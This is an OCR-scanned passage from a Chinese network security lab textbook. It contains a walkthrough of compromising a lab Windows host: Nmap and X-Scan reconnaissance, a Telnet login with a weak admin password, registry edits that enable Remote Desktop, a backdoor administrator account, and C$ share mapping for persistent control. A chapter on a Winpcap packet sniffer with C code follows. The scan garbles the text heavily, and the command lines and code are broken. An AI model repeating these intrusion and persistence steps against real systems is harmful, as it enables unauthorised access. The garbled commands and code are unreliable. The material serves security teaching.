
图 10.1 Zenmap 设置 


Nmap Output | Ports j Hosts | Topology | Host Details | scans | 
nmap -T4 -A -v -PE -P522,25,80 -PA21,23,80,3389 172.16.0.74 


Starting Nmap 5.00 ( http://nmap.org ) at 2013-06-13 14:06 cB] 
NSE: Loaded 30 scripts for scanning. 

Initiating ARP Ping Scan at 14:06 

Scanning 172.16.0.74 [1 port] 

Completed ARP Ping Scan at 14:06, 0.23s elapsed (1 total hosts) 
Initiating Parallel DNS resolution of l host. at 14:06 
Completed Parallel DNS resolution of 1 host. at 14:06, 
Initiating SYN Stealth Scan at 14:06 

Scanning 172.16.0.74 [1000 ports] 

Discovered open port 139/tcp on 172.16.0.74 
Discovered open port 23/tcp on 172.16.0.74 

Discovered open port 445/tcp on 172.16.0.74 
Discovered open port 80/tcp on 172.16.0.74 

Discovered open port 1025/tcp on 172.16.0.74 
Discovered open port 3306/tcp on 172.16.0.74 
Discovered open port 135/tcp on 172.16.0.74 
Discovered open port Zl/tcp on 172.16.0.74 

Discovered open port 9090/tcp on 172.16.0.74 
Discovered open port 1026/tcp on 172.16.0.74 
Discovered open port 6666/tcp on 172.16.0.74 

Completed SYN Stealth Scan at 14:06, 0.20s elapsed (1000 total ports) 
Initiating Service scan at 14:06 

Scanning ll services on 172.16.0.74 

Completed Service scan at 14:08, 101.10s elapsed (11 services on 1 host 
Initiating 0S detection (try $1) against 172.16.0.74 

Retrying 0S detection (try $2) against 172.16.0.74 

NSE: Script scanning 172.16.0.74. 

NSE: Starting runlevel 1 scan 

Initiating NSE at 14:08 
Completed NSE at 14:09, 


图 10.2 Zenmap 扫描 结果 


0.01s elapsed 


81.31s elapsed 


Cancel | 


(2) 主机 A 分 析 扫描 结果 。 从 扫描 结果 中 可 以 了 解 到 主机 B 开放 的 端口 信息 ,以 及 当 
前 使 用 的 操作 系统 ,确定 是 否 具有 攻击 价值 。 扫 描 的 部 分 结果 如 图 10. 2 所 示 。 
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10.5.2 进一步 扫描 


(1) 主机 A 单 击 工具 栏 中 的 X-Scan 按钮 启动 X-Scan, 在 弹出 窗口 中 单 击 菜单 栏 中 的 
“设置 ”菜单 项 ,在 弹出 的 下 拉 菜 单 中 选择 “扫描 参数 ”命令 ,在 “检测 范围 "中 填写 主机 B 的 
IP 地 址 ,展开 左 侧 树 状 接 口中 的 “全 局 设置 ”在 “扫描 模块 "选项 中 分 别 勾 选 “开放 服务 ”、 
"NT-Server 55] O $” “NetBios 信息 ”3 个 选项 ,其 他 选项 为 空 , 单 击 “ 确 定 ” 按 钮 ,完成 扫描 


参数 设 定 。X-Scan 设置 如 图 10. 3 所 示 。 


(2) 主机 A 开始 进行 扫描 。 扫 描 结束 后 ,自动 弹出 检测 报告 。 主 机 A 分 析 扫 描 结果 ， 
可 知 主机 B 开放 了 23 端口 ,可 以 进行 Telnet 连接 。 扫 描 结果 如 图 10.4 所 示 。 
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图 10.3 X-Scan 设置 


主机 检测 结果 
172.16.0.74 发 现 安全 漏洞 
主机 岳 要 - 05: Windows 2003; PORT/TCP: 21, 23, 80, 135, 139, 445, 1025, 3306 
[和 返回 顶部 ] 

主机 地 址 端口 /服务 服务 漏洞 
172.16.0.74 netbios-ssn (139/tcp) 发 现 安全 漏洞 
172.16.0.74 MySql (3306/tcp) 发 现 安全 提示 
172.16.0.74 www (Bültcp) 发 现 安全 提示 
172.16.0.74 microsoft-ds (445/tcp) 发 现 安全 提示 
172.16.0.74 ftp (21/tcp) 发 现 安全 提示 
172.16.0.74 telnet (23/tcp) 发 现 安全 提示 
172.16.0.74 epmap (135/tcp) 发 现 安全 提示 
172.16.0.74 network blackjack (1025/tcp) 发 现 安全 提示 


在 139 端口 中 的 NetBios 信息 里 可 以 看 到 主机 B. 的 账户 信息 ,并 且 发 现 了 存在 弱 口 令 
漏洞 的 test 账户 信息 ,账户 类 型 为 Administrator. #494 1234, NetBios 信息 如 图 10.5 


所 示 。 


图 10.4 X-Scan 扫描 结果 
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安全 漏洞 及 解决 方案 : 172.16.0.74 
类 型 ”端口 /服务 安全 漏洞 及 解决 方案 
漏洞 netbios-ssn (139/tcp) |NT-ServerSSE1 4 


| NT-5erver 弱 口令 : "testj1234", 账户 类 型 ; 管理 员 (Administrator) 

| 敬告 。 |netbiosssn (139/tcp) |NetBios 信 息 

[服务 器 信息 Level 101]; 

主机 名 称 : "172.16.0.74" 

操作 系统 : Windows NT 

LM 5.2 

Sen WORKSTATION SERVER SERVER, NT BACKUP. BROWSER DFS 
|Æ netbios-ssn (139/TCP) NetBios 信 息 

[服务 器 时 间 ]; 


06-13-2013 06:37:19 GMT 


图 10.5 查看 主机 B 的 账户 信息 


10.5.3 开启 远程 桌面 服务 


(1) 主机 A 尝试 使 用 “远程 桌面 "远程 登录 主机 B. 
主机 A 单 击 工具 栏 中 的 “远程 桌面 ”按钮 ,打开 远程 桌面 连接 ,尝试 登录 主机 B, 在 远程 
桌面 中 输入 主机 也 的 IP 地址 , 单 击 “ 连 接 ” 按 钮 ,由 于 主机 B 没有 开启 远程 桌面 服务 ,结果 
出 现 了 “客户 端 无 法 连接 到 远程 计算 机 ”的 提示 ,如 图 10.6 所 示 ,远程 登录 失败 。 
xi 


(x) 客户 端 无 法 连接 双 有 远程 计算 机 。 


连接 可 能 没有 启用 ， 或 者 计算 机 太 忙 ， 无 法 接受 新 连接 。 
也 有 可 能 网 络 问题 使 您 无 法 和 连接 。 


请 以 后 再 试 。 如 果 问 题 继续 出 现 ， 请 限 系 坟 管 理 员 联 系 。 
m» | 
图 10.6 远程 登录 


(2) 主机 A 使 用 Telnet 登录 主机 B。 

主机 A RKE FF a > FF” > cmd 进入 命令 行 ,在 命令 行 输 入 “telnet 主机 B 的 
IP”, 在 弹出 提示 中 输入 "n”。 在 弹出 的 Telnet 欢迎 界面 中 输入 前 面 步骤 中 已 经 扫描 出 的 用 
户 名 和 密码 ,车 登录 成 功 则 出 现 提示 ,如 图 10.7 所 示 。 


eX Telnet 172.16.0.74 


图 10.7 登录 成 功 


(3) 通过 修改 注册 表 开启 主机 B 远程 桌面 。 

主机 A 登录 成 功 后 在 命令 提示 符 下 执行 “reg query "HKEY_LOCAL_MACHINE\ 
SYSTEM\CurrentControlSet\Control\ Terminal Server"” 查 看 执行 结果 ， fDenyTSConne- 
ctions 的 值 为 ^ 
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A 
命令 


主机 A 在 提示 符 下 执行 “reg delete " 
CurrentControlSet\Control\Terminal Server" 删除 该 键 值 。 

主机 A 新 建 一 个 fDenyTSConnections 值 为 0 的 注册 表 项 ,在 命令 提示 符 下 执行 “reg 
" HKEY _ LOCAL _ MACHINE \ SYSTEM \ CurrentControlSet V Control V Terminal 


/v fDenyTSConnections /t REG. DWORD 确定 后 ,操作 成 功 , 如 图 10.8 


HKEY_LOCAL 


v fDenyTSConnections" , 


_MACHINE\SYSTEM\ 


add 
Server" d o", 


所 示 。 


IdleWinStationPoolCount 


TSAppCompat 
TSEnabled 
TSUserEnabled 


REG_DWORD 
REG_DWORD 


REG_DWORD 
6x8 
@x1 


REG_DWORD 8x8 


fSingleSessionPerUs 


fEnableSalen 
fAllowToGetHelp 


REG_DWORD 


REG_DWORD 
Oxi 


REG. DUORD 8x8 


exa 


axe 


fDenyTSConnections REG_DWORD 8x8 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set \Control\Terminal 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set \Control\Ierminal 

plications 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set \Contro1\Terminal 

onf igurat ion 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set \Control\Terminal 

HKEY_LOCAL_MACHINESSYSTEM\CurrentContro1Set \Contro1\Terminal 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set \Control\Terminal 
Mapping 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set \Contro1\Terminal 

re 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set \Control\Terminal 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set \Control\Terminal 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set \Contro1\Terminal 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set \Control\Ierminal 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set \Control\Terminal 


C:、\> 


图 10.8 新 建 注册 表 值 


主机 A 确定 修改 是 否 成 功 ,在 命令 提示 符 
“fDenyTSConnections” 的 值 ,“fDenyTSConnections” 的 值 为 

主机 A 再 次 使 用 远程 桌面 连接 主机 B, 连 接 是 否 成 功 

注 : 主机 人 A 使 用 远程 桌面 连接 主机 卫 后 , 便 可 对 主机 也 进行 
同学 可 以 自行 实验 。 


10.5.4 建立 新 用 户 


使 用 当前 获得 的 账户 登录 主机 B. 并 对 其 进行 操作 难免 会 被 


立 自己 的 账户 ,方便 以 后 对 主机 B 的 控制 。 
(1) 主机 A 再 次 使 用 test 账户 用 Telnet 命令 登 
add.myadmin 为 用 户 名 ,1234 为 密码 。 
(2) 主机 A 将 test 用 户 添加 到 administrators 组 中 ， 
localgroup administrators myadmin 


(3) 主机 A 使 用 myadmin 账户 远程 桌面 登录 


D x 


netuser myadmin 1234 


add. 
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下 再 次 执行 


在 命令 te 


Server\AddIns 
Server Muthorizedfp| 


Server*DefaultUs 


Server\Dos 
Server\InputDevices 


Server\Ke yboardT ype 


Server\Licensing Co 


Server\SysProcs 
ServerWtilities 
Server VIDEO 
Server Wids 
Server\WinStations 


(是 / 否 )。 


命令 , 查看 


于 任何 操作 ,此 处 不 做 演示 ， 


p. 


察觉 ,所 以 主机 A 需 


EDL B, 查 看 效果 。 


ud 


录 主 机 B, 并 在 命令 提示 符 下 执行 


示 符 下 执行 net 
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10.5.5 添加 磁盘 映射 


为 了 方便 以 后 对 主机 B 的 磁盘 文件 进行 操作 ,主机 A 需要 将 主机 B 的 磁盘 映射 至 本 
机 上 。 

(1) 主机 A 使 用 myadmin 账户 Telnet 命令 登录 主机 B, 在 命令 提示 符 下 输入 “net 
share c $ =c; /grant:myadmin,full”。 将 主机 B 中 的 C 盘 映 射 为 c$ ,并 赋予 完全 控制 权 
限 , 如 图 10.9 所 示 。 


Telnet 192.168.1.3 


Welcome to Microsoft Telnet Server 


re c$=c: /grant:zzp,full 


图 10.9 添加 共享 


(2) 主机 A 退出 Telnent, 并 与 主机 B 建立 IPC 连接 ,主机 A 在 命令 提示 符 下 输入 “net 
use \\ 主 机 也 的 IPNipc$ "1234" /user:"myadmin"” 
(3) 主机 A 继续 执行 命令 “net use z: NEL BAY IPNc $ "35 3E BL B 开放 的 默认 共享 
映射 为 自己 的 本 地 磁盘 Z, 如 图 10. 10 Brzs 3x FE ,操作 自己 的 Z 盘 就 是 操作 主机 B 的 
is 


fe 
int 


C 
C 


WINDOWS system32cmd.exe 


IC: NExpNIS?net use \\192.168.1.3\ipce$ /del 
\ti92.168-1-3\ipc$ 已 经 删除 。 


IC: NExpNIS»net use z: \\192.168.1.3\c$ 


图 10.10 将 目标 C 盘 映射 至 本 地 Z f 
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FE. 断 开 映 射 使 用 net use z: /del 命令 。 建 立 磁盘 映射 必须 先 建立 IPC 连接 ,要 映射 
成 的 磁盘 必须 是 主机 A 本 地 不 存在 的 盘 符 ,如 本 地 磁盘 已 经 存在 了 D 盘 ,就 不 能 再 将 目标 主 
机 的 某 个 磁盘 映射 成 主机 A 的 了 D 盘 。 

(4) 主机 A 打开 “我 的 电脑 ”查看 新 增加 的 网 络 驱动 器 Z 盘 ,如 图 10. 11 所 示 , 并 尝试 对 
Z 盘 的 文件 进行 增 、 删 、 改 操作 。 


HE) ”编辑 (E) SEV BAW TAD 帮助 (由 
QmB-O-T|DsSR xix |B o XE 


3.5 英寸 软盘 
本 地 磁盘 


图 10.11 映射 成 功 


10.6 思考 问题 


1. 为 了 提高 主机 安全 性 ,可 以 采取 哪些 方法 ? 
2. 寻找 攻击 目标 的 一 般 方法 有 哪些 ? (至 少 说 出 3 种 ) 
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第 11 章 Winpcap 嗅 探 器 


11.1 实验 目的 与 要 求 


。 掌握 网 络 嗅 探 的 原理 和 常用 网 络 嗅 探 工具 的 操作 方法 。 
”学 习 Winpcap 库 的 常用 接口 的 使 用 。 
。 学 习 使 用 Winpcap 库 提供 的 接口 设计 一 个 简单 的 嗅 探 器 。 


11.2 实验 环境 


TE VMWare 虚拟 机 中 安装 操作 系统 Windows 2003 ,在 交换 网 络 结构 下 ,每 组 1 人 ,使 
用 VC++ 6.0。 


11.3 背景 知识 


11.3.1 网 络 嗅 探 技术 


网 络 嗅 探 是 指 利用 计算 机 的 网 络 接口 截获 其 他 计算 机 的 数据 报 文 的 一 种 手段 。 网 络 嗅 
探 是 一 种 数据 链 路 层 的 技术 ,利用 的 是 共享 式 网 络 传输 介质 。 共 享 即 意 味 着 网 络 中 的 一 台 
机 器 可 以 嗅 探 到 传递 给 本 网 段 中 所 有 机 器 的 报 文 。 网 卡 存在 一 种 特殊 的 工作 模式 ,在 这 种 
工作 模式 下 ,网卡 不 对 目的 地 址 进行 判断 ,而 直接 将 它 收 到 的 所 有 报 文 都 传递 给 操作 系统 处 
理 。 这 种 特殊 的 工作 模式 ,就 称 为 混杂 模式 。 网 络 嗅 探 器 通过 将 网 卡 设置 为 混杂 模式 ,并 利 
用 数据 链 路 访问 技术 来 实现 对 网 络 的 嗅 探 。 实 现 了 对 数据 链 路 层 的 访问 ,就 可 以 把 嗅 探 的 
能 力 扩 展 到 任意 类 型 的 数据 链 路 帧 ,而 不 光 是 TP 数据 报 。 

一 般 来 说 ,网 络 嗅 探 的 实现 技术 主要 有 以 下 3 种 。 

(1) 使 用 原始 套 接 字 (Socket Raw)。 这 种 技术 虽然 实现 简单 ,但 是 只 能 获取 到 网 络 层 
以 上 的 数据 包 ,而 且 不 能 重组 数据 包 。 

(2) 使 用 NIDD 中 间 层 驱动 程序 。 功 能 强 , 不 但 可 以 截获 数据 包 ,而 且 可 以 根据 要 求 过 
滤 数 据 包 , 构 建 网 络 防火 墙 ,但 实现 起 来 比较 复杂 ,需要 了 解 Windows 内 核 驱动 等 相关 
技术 。 

(3) 使 用 Winpcap。 不 需要 对 Windows 内 核 驱动 有 深入 的 了 解 ,而且 可 以 在 很 大 程度 
上 实现 网 卡 驱 动 所 能 实现 的 功能 。 


11.3.2 Winpcap 开源 库 


首先 介绍 一 下 网 络 数据 包 捕获 开发 包 Libpcap。Libpcap 是 一 个 著名 的 专门 用 来 捕获 
网 络 数据 的 编程 接口 。 它 在 很 多 网 络 安全 领域 得 到 了 广泛 的 应 用 ,很 多 著名 的 网 络 安全 系 
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统 都 是 基于 Libpcap 而 开发 的 ,如 tcpdump snort ethereal 等 工具 。Libpcap 几乎 成 了 网 络 
数据 包 捕获 的 标准 接口 。 它 效率 很 高 ,使 用 又 极其 方便 ,而 且 它 是 一 个 跨 平台 的 网 络 编程 接 
口 。 由 于 网 络 数据 包 捕 获 功 能 是 很 多 网 络 安全 系统 都 要 实现 的 功能 ,所 以 Libpcap 应 用 的 
范围 非常 广泛 ,如 它 可 以 应 用 于 网 络 嗅 探 器 、 网 络 协议 分 析 、 网 络 入 侵 检 测 、 网 络 安全 扫描 、 
网 络 管理 .网 络 统计 等 网 络 安 全 系统 。 

Winpcap( Windows Packet Capture) 是 Windows 平台 下 一 个 免费 ,公共 的 网 络 访问 系 
统 ,是 其 他 一 些 安全 工具 的 应 用 基础 。 它 是 Libpcap 在 Windows 平台 下 的 版 本 ,对 
Windows 进行 了 优化 处 理 和 扩展 。Winpcap 提供 了 一 个 强大 的 编程 接口 , 它 很 容易 地 在 各 
个 操作 系统 之 间 进 行 移植 ,也 很 方便 程序 员 进 行 开发 。Winpcap 基于 Libpcap, 但 不 等 同 于 
Libpcap ,而 是 在 Libpcap 的 基础 上 进行 了 一 些 功能 的 扩充 ,对 各 种 Windows 系统 进行 了 平 
台 隐 项 和 优化 处 理 。 

Winpcap 不 仅 具备 了 Libpcap 的 捕获 数据 包 的 功能 ,还 具有 一 些 其 他 功能 ,总 结 如 下 。 

COD 数据 包 捕获 。 跟 Libpcap 一 样 , Winpcap 主要 的 功能 还 是 完成 了 对 网 络 数据 包 的 
捕获 。 它 可 以 捕获 在 共享 网 络 上 传输 的 各 种 网 络 数据 包 。 

(2) 数据 包 过 滤 。Winpcap 也 具备 数据 包 的 过 滤 功能 ,在 接收 网 络 数据 包 和 发 送 给 应 
用 程序 之 前 ,在 内 核 层 对 数据 包 进 行 过 滤 。 其 过 滤 规 则 与 BPF 过 滤 规 则 兼容 。 

(3) 数据 包 发 送 。 使 用 Winpcap 可 以 实现 数据 包 的 发 送 功 能 , 它 是 Libpcap 在 
Windows 下 的 扩展 ,可 以 发 送 原始 的 网 络 数据 包 , 网 络 数据 包 的 内 容 可 以 由 开发 者 自己 
确定 。 

(4) 流量 统计 。 在 Winpcap 中 还 实现 了 流量 统计 功能 ,这 也 是 在 内 核 层 实现 的 。 

(5) 数据 包 存 储 。 使 用 Winpcap 可 以 在 内 核 中 将 捕获 到 的 数据 直接 存储 到 磁盘 中 。 在 
Libpcap 中 也 可 以 对 捕获 到 的 数据 包 进 行 存 储 ,但 是 它 是 在 应 用 层 操作 的 ,而 不 是 在 内 
核 层 。 


11.3.3  Winpcap 的 内 部 结构 


首先 , 抓 包 系统 必须 绕 过 操作 系统 的 协议 栈 来 访问 在 网 络 上 传输 的 原始 数据 包 (raw 
packet) ,这 就 要 求 一 部 分 运行 在 操作 系统 核心 内 部 ,直接 与 网 络 接口 驱动 交互 。 这 个 部 分 
是 系统 依赖 (system dependent) 的 ,在 Winpcap 的 解决 方案 里 它 被 认为 是 一 个 设备 驱动 , 称 
为 NPF(Netgroup Packet Filter), Winpcap 开发 小 组 针对 Windows 95, Windows 98、 
Windows ME, Windows NT 4, Windows 2000 和 Windows XP 提供 了 不 同 版 本 的 驱动 。 这 
些 驱动 不 仅 提 供 了 基本 的 特性 (如 抓 包 和 injection) ,还 有 更 高 级 的 特性 (如 可 编程 的 过 滤器 
系统 和 监视 引擎 ) 。 前 者 可 以 被 用 来 约束 一 个 抓 包 会 话 ,只 针对 网 络 通信 中 的 一 个 子 集 ( 如 
仅仅 捕获 特殊 主机 产生 的 FTP 通信 的 数据 包 ) ,后 者 提供 了 一 个 强大 而 简单 的 统计 网 络 通 
信 量 的 机 制 (如 获得 网 络 负载 或 两 个 主机 间 的 数据 交换 量 ) 。 

其 次 , 抓 包 系统 必须 有 用 户 级 的 程序 接口 ,通过 这 些 接口 ,用 户 程序 可 以 利用 内 核 驱 动 
提供 的 高 级 特性 。Winpcap 提供 了 两 个 不 同 的 库 , 即 packet. dll 和 wpcap. dll。 前 者 提供 了 
一 个 底层 API, 伴 随 着 一 个 独立 于 Microsoft 操作 系统 的 编程 接口 ,这些 API 可 以 直接 用 来 
访问 驱动 的 函数 ;后 者 导出 了 一 组 更 强大 的 与 Libpcap 一 致 的 高 层 抓 包 函 数 库 (capture 
primitives) 。 这 些 函 数 使 得 数据 包 的 捕获 以 一 种 与 网 络 硬件 和 操作 系统 无 关 的 方式 进行 。 
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如 图 11.1 所 示 ,第 一 部 分 是 内 核 层 的 数据 包 过 滤 模 块 (NPF Device Driver) 。 该 模块 相 


XF Linux F Libpcap 使 用 的 BPF 过 滤 规 则 模 
块 ,实现 了 高 效 的 网 络 数据 包 的 捕获 和 过 滤 功 能 ， 
其 过 滤 规 则 跟 BPF 过 滤 规 则 是 一 样 的 。 此 过 滤 模 
块 实际 是 一 个 驱动 程序 ,被 称 为 NPF (Netgroup 
Packet Filter) 数 据 包 驱动 程序 。 

第 二 部 分 是 动态 链接 库 Packet. dll, 它 是 提供 
给 开发 者 的 一 个 接口 ,使 用 它 就 可 以 调用 Winpcap 
的 函数 , 它 是 一 个 较 低层 的 开发 接口 。 

第 三 部 分 是 动态 链接 库 Wpcap. dll。 它 也 是 
提供 给 开发 者 的 一 个 接口 ,但 它 是 一 个 更 高 层 的 编 
程 接口 ,其 调用 与 系统 无 关 。 它 是 基于 Libpcap 而 
设计 ,所 以 基于 Libpcap 的 程序 可 以 使 用 Wpcap. 
dll 来 移植 到 Windows 平台 下 ;或 者 说 ,可 以 在 


Application 


Wpcap.dll 


Packet.dll 


SEE 1 NE 


User Level 


NPF 


Packets 


图 11.1 Winpcap 的 内 部 结构 


Windows 平 台 下 设计 类 似 于 Libpcap 的 程序 ,其 实现 过 程 跟 Libpcap 的 使 用 非常 相似 。 使 
用 此 接口 进行 编程 ,其 函数 的 调用 与 Libpcap 的 调用 几乎 完全 一 样 , 函 数 名 称 和 参数 的 定义 
也 一 样 。 几 乎 可 以 把 在 Linux 下 使 用 Libpcap 编写 的 程序 原封 不 动 地 搬 到 Windows 平台 
下 。 可 以 说 ,Winpcap 就 是 Windows 下 Libpcap 开发 包 , 其 使 用 方法 完全 跟 Libpcap 一 样 。 
在 Winpcap 中 虽然 屏蔽 了 操作 系统 的 不 同 之 处 ,但 它 提 供给 用 户 的 接口 跟 Libpcap 的 接口 


完全 一 样 。 
11.3.4 Winpcap 接口 函数 介绍 


1. pcap findalldevs 函数 


int pcap findalldevs ex(pcap if t** alldevs, char* errbuf) 


函数 返回 值 : 如 果 函 数 操作 成 功 ,就 返回 0; 如 果 失 败 ,就 返回 一 1。 
参数 描述 : 参数 alldevs 是 一 个 指向 pcap_if_t 结构 体 的 指针 , 当 函 数 返回 时 ,将 指向 接 
口 列表 的 第 一 个 元 素 ;参数 errbuf 用 来 存储 错误 信息 ,是 一 个 字符 型 指针 ,指向 一 个 大 小 为 
PCAP ERRBUF SIZE 的 缓冲 区 ,这 个 缓冲 区 将 被 填充 错误 信息 。 
功能 描述 : 查找 机 器 的 所 有 可 用 的 网 络 接口 ,用 一 个 网 络 接口 链表 返回 。 当 接口 链表 
不 再 使 用 时 ,必须 调用 pcap_freealldevs() 函 数 进行 释放 。 


2. pcap freealldevs 函数 
void pcap freealldevs(pcap if tx alldevs) 


函数 返回 值 : X. 


参数 描述 : 参数 alldevs 表示 一 个 网 络 接口 链表 ,是 由 pcap_findalldevs 返回 的 。 
功能 描述 : 释放 网 络 接口 链表 中 的 所 有 网 络 接口 。 


3. pcap open live 函数 


pcap t * pcap open live(oonst char * device, int snaplen,int pramisc,int to ms,char * ebuf) 


函数 返回 值 : 返回 一 个 Libpcap 句柄 。 


87 


网 络 安全 与 管理 实验 教程 


88 


参数 描述 : 参数 device 表示 网 络 接口 名 字 , 是 以 0 结尾 的 字符 串 ;参数 snaplen 表示 捕 
获 数据 包 的 长 度 ;参数 promisc 表示 是 否 设 置 混杂 模式 .如果 赋值 为 1, 就 表示 设置 为 混杂 模 
式 ; 参 数 to_ms 表示 等 待 的 时 间 , 以 毫秒 为 单位 ;参数 ebuf 表示 存储 错误 信息 。 

功能 描述 : 打开 一 个 网 络 接 口 进行 数据 包 捕 获 。 打 开 的 模式 由 promisc 表示 ,如 果 是 
1, 就 表示 以 混杂 模式 打开 此 网 络 接口 ;否则 ,以 非 混 杂 模 式 打开 网 络 接口 。 

4. pcap_next_ex 函数 

int pcap next ex(pcap t * p,struct pcap pkthdr **pkt header,const u_char **pkt data) 


函数 返回 值 : 函数 操作 成 功 就 返回 1, 如 果 超 时 就 返回 0, 失败 则 返回 一 1 或 一 2 。 

参数 描述 : 参数 p 表示 pcap 句柄 ;参数 pkt_header 表示 数据 包头 ;参数 pkt_data 表示 
数据 包 。 

功能 描述 : 此 函数 的 功能 是 捕获 一 个 网 络 数据 包 。 

5. pcap loop 函数 

int pcap locp(pcap t* p,int ent,pcap handle callback,u char* user) 


函数 返回 值 : 函数 操作 成 功 则 返回 0, 失 败 则 返回 负数 。 

参数 描述 : 参数 p 表示 pcap 句柄 ,是 一 个 指向 pcap_t 结构 的 指针 ,指定 了 一 个 设备 ; 参 
数 cnt 表示 捕获 数据 包 的 个 数 ,如 果 是 一 1, 就 表示 捕获 个 数 为 无 限 个 ;参数 callback 是 一 个 
函数 指针 ,指向 处 理 数据 包 的 回调 函数 ;参数 user 表示 向 回调 函数 中 传输 的 参数 。 

功能 描述 : 此 函数 是 循环 捕获 网 络 数据 包 , 直 到 遇 到 错误 或 满足 退出 条 件 。 每 捕获 一 
个 数据 包 就 调用 callback 指向 的 回调 函数 。 所 以 ,可 以 在 回调 函数 中 对 捕获 到 的 数据 包 进 
行 操作 。 

6. pcap close(pcap t * p) 函 数 

void pcap close(pcap t * p) 


函数 返回 值 : 无 。 

参数 描述 : 参数 p 表示 pcap 句柄 。 

功能 描述 : 此 函数 的 功能 是 关闭 pcap 操作 ,并 销毁 相应 资源 。 

函数 pcap_loop 的 使 用 方法 与 pcap_next_ex 是 不 同 的 。 在 使 用 pcap_loop 时 ,应 该 使 
用 回调 函数 来 对 捕获 的 网 络 数 据 包 进行 分 析 。 在 函数 pcap_loop 中 先 注册 回调 函数 ,注册 
之 后 ,每 捕获 一 个 数据 包 , 就 调用 回调 函数 一 次 ,所 以 可 以 在 回调 函数 中 对 捕获 到 的 每 个 数 
据 包 进行 处 理 。 回 调 函 数 是 用 户 自己 定义 的 ,但 必须 满足 Winpcap 规定 的 函数 类 型 。 
Winpcap 规定 的 回调 函数 的 类 型 定义 如 下 。 


typedef void(* pcap handler) (u_char * , const struct pcap pkthdr * , const u char* ) 

其 中 ,第 一 个 参数 表示 从 函数 peap. loop 传递 进来 的 参数 ;第 二 个 参数 是 描述 捕获 到 的 
数据 包 的 信息 ;第 三 个 参数 是 u_char * 类 型 , 它 表示 捕获 到 的 网 络 数据 包 的 内 容 。 把 数据 
包 的 内 容 取出 ,就 可 以 对 它 进行 分 析 了 。 第 三 个 参数 是 最 重要 的 参数 。 

11.4 实验 内 容 


学 习 Winpcap 库 的 常用 接口 的 使 用 ,基于 Winpcap 库 提供 的 接口 编写 程序 设计 一 个 简 


第 1 章 。Wrpcap 嗅 探 器 


单 的 嗅 探 器 。 
11.5 实验 步骤 


11.5.1 创建 工程 


启动 VC++ 6.0, 选 择 File Open Workspace 菜单 命令 ,新 建 一 个 工程 文件 , 如 
WinpcapProject. dsw ,打开 WinpcapProject. cpp 文件 ,基于 Winpcap 库 编写 代码 实现 一 个 
简单 的 嗅 探 器 ,使 用 pcap_loop 实现 pcap_next_ex 功能 。 定 义 回 调 函 数 ,通过 调用 回调 函数 
显示 网 络 数据 包 内 容 。 例 程 如 下 : 


# include pcap.h> 
# include <stdio.h> 


void callbackFunc(u char * args, 
const struct pcap pkthdr * header, 
const u char * content) 


struct tm * ltime; 
char timestr[16]; 


* argst +; 
ltime- localtime (&header- > ts.tv sec); 
strftime(timestr, sizeof (timestr), "$H:%M:%S", ltime); 


printf (" Notd. 时 间 %s. KE Sa Vn", * args, timestr, header- > len); 
for (unsigned int j=1; j« header- > lem 1; j++) 
{ 
printf ("%.2x", content [j- 1]); 
if ((j%16)==0) 
printf ("^n"); 


pcap t * pcaphandler; 

char ebuf[FCAP ebuf SIZE]; 
int inure 0, i= 0; 

int sumofPacket= 0; 


if (pcap_finddevices (&devices, ebuf)==- 1) 
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printf ("error when calling pcap finddevices:%s\n", ebuf); 
exit (1); 
} 
for (d= devices; d; d- d- > next) 
{ 
printf ("sd.%s",+ +i, d- >name); 
if(d-» description) 
printf ("$sWn", d > description); 
else 
printf (" no description available n"); 
) 
if(ü--0) 
{ 
printf ("^n cannot find winpcap lib.\n"); 
retum - 1; 


printf ("Input interface number (1- %d):", i); 
Scanf("*d", &inum); 
if (inur< 1 || inum i) 
{ 

printf ("\nInterface number out of range.\n"); 

pcap freedevioes (devices); 

retum - 1; 
) 
for(d-devioes, i=0; i« inum- 1; de d- » next,it4); 
if((pcaphandler- pcap open live (d- > name, 65535, 1, 1000, ebuf) )= = NULL) 
{ 

printf ("Cannot cpen device.\n"); 

pcap freedevioes (devices); 

retum - 1; 
} 
printf ("^n listening ongs… \n" d- > description); 
peap_freedevices (devices); 
pcap loop(peaphandler, - 1, callbackFunc, (u char* ) &sumofPacket) ; 
pcap close (pcaphandler) ; 


retum 0; 


11.5.2 配置 编译 环境 


使 用 VC++ 6.0 来 编译 WinpcapProject. cpp 源 文件 ,这 里 注意 需 在 WinpcapProject T. 
程 中 进行 一 些 设置 ,添加 Winpcap 开发 头 文件 和 静态 链接 库 路 径 。 具 体 过 程 是 ,在 VC 环 
境 中 选择 Tools 菜单 中 的 Options 命令 ,打开 Options 对 话 框 ,选择 Directories 选项 卡 , 然 
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SUB Wirpcep 嗅 探 器 


后 在 Include files 中 添加 路 径 指 向 \WPDPACK4.0BETAINMINCLUDE, 如 图 11.2 所 示 。 
SS Aix 


Editor | Tabs | Debug | Compatibility | Build Directories | Source G] 


Platform: Show directories for: 
|Win32 =] [Include files 7 
[Directories: x4 


CAPROGRAM FILES\MICROSOFT VISUAL STUDIOYVCSBYPLATFORMSDKYNCI 
C:\Program Files\Microsoft Visual Studio\VC98\INCLUDE 
C:\Program Files\Microsoft Visual Studio\¥C98\MFC\INCLUDE 
C:\Program Files\Microsoft Visual Studio\¥C98\ATLYINCLUDE 
C:\ExpNIS\NetAD-Lab\PROJECTS\WPDPACK4.0BETAI\INCLUDE 


图 11.2 在 Include files 中 添加 路 径 


然后 在 Library files 中 添加 路 径 指向 WPDPACK4. 0BETA1\LIB, 如 图 11. 3 所 示 。 
[options 下 区 


Editor | Tabs | Debug | Compatibility | Build Directories | Source 


Platform: Show directories for: 
[win32 =| mT -| 


[Directories: nx 


C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\YC98\PLATFORMSDK\LIB 
CaProgram Files\Microsoft Visual Studio\¥C98\LIB 
CaProgram Files\Microsoft Visual Studio\¥C98\MFC\LIB 

CAEXpNISWetAD-LabYPROJECTSYWPDPACKA.0BETATILIB. 


